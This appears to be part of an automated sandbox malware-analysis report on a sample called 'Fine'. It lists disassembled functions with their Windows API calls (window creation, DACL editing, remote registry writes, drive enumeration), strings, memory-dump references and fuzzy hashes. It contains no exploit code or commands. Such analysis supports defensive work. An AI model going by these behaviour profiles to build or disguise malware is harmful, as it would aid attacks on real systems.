                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2012914c09d7257581326c9a2c6f09071cfb355fc65aacfb7b56a501534d5dff
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7CB16F71A10209EFEB14DFA8DC49FAEBBB9EB09710F008555F915E7290CBB4AD44CB94
                                                                                                                                                                                                                                                                                                                            Function 00245524 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • SetErrorMode.KERNEL32(00000001), ref: 00245532
                                                                                                                                                                                                                                                                                                                            • GetDriveTypeW.KERNEL32(?,0026DC30,?,\\.\,0026DCD0), ref: 0024560F
                                                                                                                                                                                                                                                                                                                            • SetErrorMode.KERNEL32(00000000,0026DC30,?,\\.\,0026DCD0), ref: 0024577B
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: ErrorMode$DriveType
                                                                                                                                                                                                                                                                                                                            • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                                                                                                                                                                                                                                            • API String ID: 2907320926-4222207086
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 475e07d4f25bdae90fb4f1f15ea2c53df0f4181f355bc85f696275cefe4a2a4c
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 8dbc8490116b308541ca4eba91505513d1ccef8f5fbf710088326b365c3e6112
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 475e07d4f25bdae90fb4f1f15ea2c53df0f4181f355bc85f696275cefe4a2a4c
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0061D530A7891ADFCB2CDF24C9D1878B3A1EF15754B248066E486AB293C7B1DD71CB51
                                                                                                                                                                                                                                                                                                                            Function 001D2521 Relevance: 42.3, APIs: 18, Strings: 6, Instructions: 282windowtimeCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 001D25F8
                                                                                                                                                                                                                                                                                                                            • GetSystemMetrics.USER32(00000007), ref: 001D2600
                                                                                                                                                                                                                                                                                                                            • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 001D262B
                                                                                                                                                                                                                                                                                                                            • GetSystemMetrics.USER32(00000008), ref: 001D2633
                                                                                                                                                                                                                                                                                                                            • GetSystemMetrics.USER32(00000004), ref: 001D2658
                                                                                                                                                                                                                                                                                                                            • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 001D2675
                                                                                                                                                                                                                                                                                                                            • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 001D2685
                                                                                                                                                                                                                                                                                                                            • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 001D26B8
                                                                                                                                                                                                                                                                                                                            • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 001D26CC
                                                                                                                                                                                                                                                                                                                            • GetClientRect.USER32(00000000,000000FF), ref: 001D26EA
                                                                                                                                                                                                                                                                                                                            • GetStockObject.GDI32(00000011), ref: 001D2706
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000030,00000000), ref: 001D2711
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D19CD: GetCursorPos.USER32(?), ref: 001D19E1
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D19CD: ScreenToClient.USER32(00000000,?), ref: 001D19FE
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D19CD: GetAsyncKeyState.USER32(00000001), ref: 001D1A23
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D19CD: GetAsyncKeyState.USER32(00000002), ref: 001D1A3D
                                                                                                                                                                                                                                                                                                                            • SetTimer.USER32(00000000,00000000,00000028,001D199C), ref: 001D2738
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                                                                                                                                                                                                                                            • String ID: <)*$<)*$AutoIt v3 GUI$(*$(*$(*
                                                                                                                                                                                                                                                                                                                            • API String ID: 1458621304-265130297
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 498e078d6a2877343279acf56e29a68e32712378e8397d1b0f9aa8370fea07f6
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 8d8d4ef1bcc15879a1eea963190b753dd8584d4b5ac3526172649aed3932e0a7
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 498e078d6a2877343279acf56e29a68e32712378e8397d1b0f9aa8370fea07f6
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AAB17D31A0020ADFDB14DFA8EC49BEE7BB5FB58714F114219FA15A7290CBB4E850CB51
                                                                                                                                                                                                                                                                                                                            Function 00261A8F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 284windowCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetCursorPos.USER32(?), ref: 00261BC4
                                                                                                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 00261BD9
                                                                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(00000000), ref: 00261BE0
                                                                                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00261C35
                                                                                                                                                                                                                                                                                                                            • DestroyWindow.USER32(?), ref: 00261C55
                                                                                                                                                                                                                                                                                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00261C89
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00261CA7
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00261CB9
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000421,?,?), ref: 00261CCE
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00261CE1
                                                                                                                                                                                                                                                                                                                            • IsWindowVisible.USER32(00000000), ref: 00261D3D
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 00261D58
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 00261D6C
                                                                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 00261D84
                                                                                                                                                                                                                                                                                                                            • MonitorFromPoint.USER32(?,?,00000002), ref: 00261DAA
                                                                                                                                                                                                                                                                                                                            • GetMonitorInfoW.USER32(00000000,?), ref: 00261DC4
                                                                                                                                                                                                                                                                                                                            • CopyRect.USER32(?,?), ref: 00261DDB
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000412,00000000), ref: 00261E46
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                                                                                                                                                                                                                                            • String ID: ($0$tooltips_class32
                                                                                                                                                                                                                                                                                                                            • API String ID: 698492251-4156429822
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 7b1254d221ba56037692f98027d6c3dbe73f12bf2a4bd920066dbd211463c5af
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 176ef0297147e67f917a0fc4122f30a889d09f5373c3884683ebf715f01b4276
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7b1254d221ba56037692f98027d6c3dbe73f12bf2a4bd920066dbd211463c5af
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F6B1BB71614341AFD704DF64D888B6FBBE4FF84314F048919F99A9B2A1C771E8A4CB92
                                                                                                                                                                                                                                                                                                                            Function 00260CDD Relevance: 35.4, APIs: 7, Strings: 13, Instructions: 391windowCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • CharUpperBuffW.USER32(?,?), ref: 00260D81
                                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00260DBB
                                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00260E25
                                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00260E8D
                                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00260F11
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00260F61
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00260FA0
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001EFD52: _wcslen.LIBCMT ref: 001EFD5D
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00232B8C: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00232BA5
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00232B8C: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00232BD7
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                                                                                                                                                                                                                                                            • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                                                                                                                                                                                                                                                            • API String ID: 1103490817-719923060
                                                                                                                                                                                                                                                                                                                            • Opcode ID: baebcc8dd37b81233e43371db27213fc6af1db6dcfc85735bcc53bc6581b26e4
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 275f35d655b46c46140f17c8a295c32544ee6f0fcf50b731beecb751b355c8c3
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: baebcc8dd37b81233e43371db27213fc6af1db6dcfc85735bcc53bc6581b26e4
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 46E1C1312282428FCB14DF24C99182BB3E2FF99314B18495DF8969B3A1DB31ED95DB91
                                                                                                                                                                                                                                                                                                                            Function 002316D7 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00231A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00231A60
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00231A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,002314E7,?,?,?), ref: 00231A6C
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00231A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,002314E7,?,?,?), ref: 00231A7B
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00231A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,002314E7,?,?,?), ref: 00231A82
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00231A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00231A99
                                                                                                                                                                                                                                                                                                                            • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00231741
                                                                                                                                                                                                                                                                                                                            • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00231775
                                                                                                                                                                                                                                                                                                                            • GetLengthSid.ADVAPI32(?), ref: 0023178C
                                                                                                                                                                                                                                                                                                                            • GetAce.ADVAPI32(?,00000000,?), ref: 002317C6
                                                                                                                                                                                                                                                                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 002317E2
                                                                                                                                                                                                                                                                                                                            • GetLengthSid.ADVAPI32(?), ref: 002317F9
                                                                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00231801
                                                                                                                                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 00231808
                                                                                                                                                                                                                                                                                                                            • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00231829
                                                                                                                                                                                                                                                                                                                            • CopySid.ADVAPI32(00000000), ref: 00231830
                                                                                                                                                                                                                                                                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0023185F
                                                                                                                                                                                                                                                                                                                            • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00231881
                                                                                                                                                                                                                                                                                                                            • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00231893
                                                                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 002318BA
                                                                                                                                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 002318C1
                                                                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 002318CA
                                                                                                                                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 002318D1
                                                                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 002318DA
                                                                                                                                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 002318E1
                                                                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 002318ED
                                                                                                                                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 002318F4
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00231ADF: GetProcessHeap.KERNEL32(00000008,002314FD,?,00000000,?,002314FD,?), ref: 00231AED
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00231ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,002314FD,?), ref: 00231AF4
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00231ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,002314FD,?), ref: 00231B03
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 4175595110-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 0d9453e05d8c498449e2a94625808a669025a330bde00694fddbc54c00796d08
                                                                                                                                                                                                                                                                                                                            • Instruction ID: eadffe99fb43bb2430e0c679090b238654ef4332c534844f6bd7d87abf730d63
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0d9453e05d8c498449e2a94625808a669025a330bde00694fddbc54c00796d08
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E0715EB1E1020AAFEF10DFA5EC49FAEBBB8BF04310F148155F915A6190D7719925CB60
                                                                                                                                                                                                                                                                                                                            Function 0025CE17 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0025CF1D
                                                                                                                                                                                                                                                                                                                            • RegCreateKeyExW.ADVAPI32(?,?,00000000,0026DCD0,00000000,?,00000000,?,?), ref: 0025CFA4
                                                                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 0025D004
                                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 0025D054
                                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 0025D0CF
                                                                                                                                                                                                                                                                                                                            • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 0025D112
                                                                                                                                                                                                                                                                                                                            • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 0025D221
                                                                                                                                                                                                                                                                                                                            • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 0025D2AD
                                                                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 0025D2E1
                                                                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 0025D2EE
                                                                                                                                                                                                                                                                                                                            • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 0025D3C0
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                                                                                                                                                                                                                                                                                            • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                                                                                                                                                                                                                            • API String ID: 9721498-966354055
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 90af9a880ede7b0beb8db02bf8e3282602d4c4a18bca193813af06bfcb1b26cc
                                                                                                                                                                                                                                                                                                                            • Instruction ID: bca46e928ed12f8b42d2ed8b490f393a1bd761a153736a83fbd6274f6826c48c
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 90af9a880ede7b0beb8db02bf8e3282602d4c4a18bca193813af06bfcb1b26cc
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F11269356142019FDB24DF14C881B2AB7E5FF88714F14889EF98A9B3A2DB31ED45CB85
                                                                                                                                                                                                                                                                                                                            Function 002613BA Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • CharUpperBuffW.USER32(?,?), ref: 00261462
                                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 0026149D
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 002614F0
                                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00261526
                                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 002615A2
                                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 0026161D
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001EFD52: _wcslen.LIBCMT ref: 001EFD5D
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00233535: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00233547
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                                                                                                                                                                                                                                                            • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                                                                                                                                                                                                                                            • API String ID: 1103490817-4258414348
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 4b2664bfddaa89ae2e9bb7677a35d92918e2ce59da4c31187a96e3a190ef6d4f
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 906de4b6147d3e3111b535922fc18d9f9ada56384b880d4b2cd94c0754ff2b32
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4b2664bfddaa89ae2e9bb7677a35d92918e2ce59da4c31187a96e3a190ef6d4f
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2EE1B0356283428FCB14DF25C45182AB7E2BFA4314F58895DF8969B3A1DB30FDA5CB81
                                                                                                                                                                                                                                                                                                                            Function 0025D3F8 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: _wcslen$BuffCharUpper
